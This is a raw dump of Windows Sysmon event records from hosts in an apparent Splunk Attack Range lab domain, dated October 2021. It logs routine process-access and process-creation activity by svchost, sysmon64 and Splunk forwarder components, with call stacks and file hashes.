07:46:35.788{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080681Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:35.788{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080680Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:35.788{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080679Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:35.788{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080678Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:35.788{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080677Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:35.788{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080676Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:35.788{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080675Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:35.788{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080674Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:35.788{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080673Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:35.788{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B15B-615A-2A01-00000000FD01}2716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080672Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:35.788{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B15B-615A-2A01-00000000FD01}2716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000080671Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:35.789{2FDD8D40-B15B-615A-2A01-00000000FD01}2716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000102784Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:36.357{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7235FE16C85A64BBA5B41B4728BF42D3,SHA256=55F45D91FF5B6B2C2293B050DE423B2B1DC6D48CC1D735B17056EDAF72B92EA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080701Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:36.788{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=00D7B1B42B881E49E79CE6277611F25F,SHA256=79A9A507CE96577B4ABCC1629AB302571CD61378267A4A0F9A3B5E85C2E682C7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080700Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:36.726{2FDD8D40-B15C-615A-2B01-00000000FD01}14123212C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080699Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:36.569{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B15C-615A-2B01-00000000FD01}1412C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080698Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:36.569{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080697Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:36.569{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080696Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:36.569{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080695Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:36.569{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080694Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:36.569{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080693Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:36.569{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080692Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:36.569{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080691Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:36.569{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080690Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:36.569{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080689Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:36.569{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B15C-615A-2B01-00000000FD01}1412C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080688Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:36.569{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B15C-615A-2B01-00000000FD01}1412C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 